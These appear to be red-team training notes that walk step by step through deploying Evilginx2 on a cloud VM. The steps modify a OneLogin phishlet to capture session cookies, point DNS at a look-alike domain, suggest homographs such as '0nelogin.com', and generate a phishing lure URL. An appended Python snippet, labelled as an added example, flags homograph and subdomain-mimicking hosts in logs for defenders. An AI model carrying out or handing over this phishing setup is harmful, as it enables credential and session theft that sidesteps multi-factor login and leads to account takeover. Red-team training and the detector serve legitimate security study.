EVILGINX (AWS EC2/AZURE)
this is a relay framework that acts as a web proxy and can be used by red teams to phish credentials. the tool sits in the middle of the traffic and holds a back-end connection to the legitimate website, through which it forwards the victim's data to the real site. the evilginx vps subdomain MUST exactly match the legitimate subdomain being spoofed.
#create the ec2/azure instance
root@oco:~$ BROWSER > https://portal.azure.com > Virtual Machines
Project Details
Subscription: {subscription}
Resource Group: {resourceGroup}
Instance Details
Virtual Machine Name: {evilginx}
Region: US
Availability Options: No Infrastructure Redundancy Required
Security Type: Standard
Image: Ubuntu Server 20.04 LTS - x64 Gen2
VM Architecture: x64
Run w/ Azure Spot Discount: Disabled
Size: Standard D2as_v4 - 2 vcpus 8GiB memory ($$$)
Administrator Account
Authentication Type: SSH public Key
Username: {evilginxUser}
SSH Public Key Source: Generate new key pair
Key pair name: {arbitraryValue}
Inbound Port Rules
Public Inbound ports: None //this disables public access to the instance
Select Inbound Ports: N/A
Disks
Encryption at host: Disabled
OS Disk
OS Disk Type: Premium SSD (locally-redundant storage - LRS)
Delete w/ VM: Enabled
Key Management: Platform-managed key
Enable Ultra Disk Compatibility: Disabled
Data Disks for {evilginx}: Create and attach a new disk
Name: {evilginx}_DataDisk_0
Source Type: None (Empty Disk)
Size: 16 GiB
Key management: Platform-managed key
Enable shared disk: No
Delete disk w/ VM: Enabled
Management
Network Interface
Virtual Network: {...LabVNet}
Subnet: default (.../24)
Public IP: {...}
NIC Network Security Group: Basic
Public Inbound Ports: None
Select Inbound Ports: N/A
Delete NIC when VM is deleted: Disabled
Enable Accelerated Networking: Enabled
Load Balancing
Place VM Behind Existing LB Solution: Disabled
* Create the VM after review
#create a DNS A record pointing {subdomain}.{domain}.{tld} to the vps instance ip
#this is required prior to proceeding
#connect to the ec2 virtual machine
root@oco:~$ ssh -i {key}.pem ubuntu@ec2.compute.amazonaws.com
#install golang
root@evilginx:~$ go version
root@evilginx:~$ sudo apt update
root@evilginx:~$ sudo apt update && sudo apt upgrade -y
root@evilginx:~$ wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
* ALT: sudo apt install golang -y
root@evilginx:~$ sudo tar -xvf go1.11.linux-amd64.tar.gz
root@evilginx:~$ sudo mv go /usr/local
root@evilginx:~$ sudo cp /usr/local/go/bin/go /usr/bin
root@evilginx:~$ nano .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
root@evilginx:~$ source .profile //reflect changes
#install evilginx
root@evilginx:~$ go get -u github.com/kgretzky/evilginx2
root@evilginx:~$ ls
go
root@evilginx:~$ cd go
root@evilginx:~$ ls
bin src
root@evilginx:~$ ls bin
evilginx2
root@evilginx:~$ ls src/github.com/kgretzky/evilginx2/
...phishlets templates database
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/
root@evilginx:~$ ls phishlets
...onelogin.yaml amazon.yaml
root@evilginx:~$ cd phishlets
#disable unnecessary statements
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
#- {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false}
#- {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
* comment statements that are not required in CUOPS
#modify configuration for operations
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
- {phish_sub: 'cwlab', orig_sub: 'cwlab', domain: 'onelogin.com', session: true, is_landing: true}
auth_tokens:
- domain: '.onelogin.com'
keys: ['onelogin.com_user']
- domain: 'cwlab.onelogin.com'
keys: ['sub_session_onelogin.com']
login:
domain: 'cwlab.onelogin.com'
path: '/login'
#phishlets format; note that the phish subdomain MUST match the legitimate subdomain!
* legitimate subdomain: {cwlab}.onelogin.com
* phishing subdomain: {cwlab}.cyberwarfare.live
#perform a test to see the flow of how a potential target will login to the legitimate site
root@oco:~$ BROWSER > {cwlab}.onelogin.com
redirect: https://cwlab.onelogin.com/login2/?retrn=eyJ0...
* this is done IOT see the parameters needed to fully configure evilginx to the operation
#reconfigure the evilginx server hostname to match the target webserver as close as possible - use homographs
root@evilginx:~$ hostname
evilginx
root@evilginx:~$ sudo nano /etc/hostname
cyberwarfare.live
root@evilginx:~$ hostnamectl status
Static Hostname: cyberwarfare.live
root@evilginx:~$ sudo reboot
root@cyberwarfare:~$ hostname
cyberwarfare.live
root@cyberwarfare:~$ cd $GOPATH/bin
root@cyberwarfare:~$ ls
evilginx2
#start evilginx2
root@cyberwarfare:~$ sudo ./evilginx2 -p /home/azureuser/go/src/github.com/kgretzky/evilginx2/phishlets/
* the -p specifies the phishlets directory
#configure the domain
evilginx: config domain cyberwarfare.live
evilginx: config ip {evilginx IP from cloud instance}
* {4.193.141.23}
#create a DNS A record pointing {cyberwarfare.live} to the vps instance ip
#use own squarespace domain account
root@oco:~$ BROWSER > https://squarespace.com
Name: cwlab.cyberwarfare.live
IP: {4.193.141.23}
Type: A Record
root@oco:~$ nslookup cwlab.cyberwarfare.live
* must resolve to {4.193.141.23}
evilginx: phishlets hostname onelogin {cyberwarfare.live}
evilginx: phishlets enable onelogin
* this cmd will automatically register & setup the TLS/SSL certificate for the domain cyberwarfare.live
evilginx: lures create onelogin
evilginx: lures edit 0 redirect_url https://cyberwarfare.live
evilginx: get-url 0
https://cwlab.cyberwarfare.live/hmHyBQkP
* this will be the look-alike phishing URL for cwlab.onelogin.com
- the evilginx domain {cyberwarfare.live} must MATCH the legitimate site as close as possible
- e.g., using homographs etc
- legit site: onelogin.com
- homograph: 0nelogin.com
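Defensive counterpart to the two matching rules above (the phish subdomain reusing the legitimate subdomain label under a foreign domain, and a homograph such as 0nelogin.com standing in for onelogin.com). This is an added example, not part of the original notes or of evilginx: it classifies hostnames pulled from mail or proxy logs against a protected login host. The confusable table, the two-label registered-domain split and the sample URLs are constructed assumptions.

```python
from urllib.parse import urlparse

# Constructed confusable table: look-alike sequence -> the characters it imitates.
CONFUSABLE_PAIRS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# Legitimate login host from the notes; a real deployment would list every protected host.
PROTECTED = {"cwlab.onelogin.com"}

# Constructed sample of URLs as they might be extracted from mail or proxy logs.
SAMPLE_URLS = [
    "https://cwlab.onelogin.com/login2/?retrn=x",   # the real login page
    "https://cwlab.cyberwarfare.live/hmHyBQkP",     # legit subdomain label, foreign domain
    "https://cwlab.0nelogin.com/login",             # homograph of the registered domain
    "https://portal.example.net/",                  # unrelated traffic
]


def normalize(label: str) -> str:
    """Map confusable sequences to the letters they imitate (assumed table above)."""
    label = label.lower()
    for fake, real in CONFUSABLE_PAIRS:
        label = label.replace(fake, real)
    return label


def split_host(host: str):
    """Return (subdomain, registered_domain); assumes a simple two-label registered domain."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def classify(host: str, protected=PROTECTED) -> str:
    """Verdict for one hostname: legit, homograph, subdomain-mimic or unrelated."""
    sub, reg = split_host(host)
    parts = [split_host(p) for p in protected]
    if any(reg == preg for _, preg in parts):
        return "legit"            # genuinely under the protected registered domain
    if any(normalize(reg) == normalize(preg) for _, preg in parts):
        return "homograph"        # e.g. 0nelogin.com -> onelogin.com after normalization
    if any(sub and sub == psub for psub, _ in parts):
        return "subdomain-mimic"  # e.g. cwlab.<other-domain> copying cwlab.onelogin.com
    return "unrelated"


def scan(urls) -> dict:
    """Return {url: verdict} for every URL that looks like an imitation of a protected host."""
    findings = {}
    for url in urls:
        verdict = classify(urlparse(url).hostname or "")
        if verdict not in ("legit", "unrelated"):
            findings[url] = verdict
    return findings
```

Feeding `scan()` the extracted URL list flags the two imitation hosts and ignores both the real login page and unrelated traffic.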
* sessions
- this cmd wasn't shown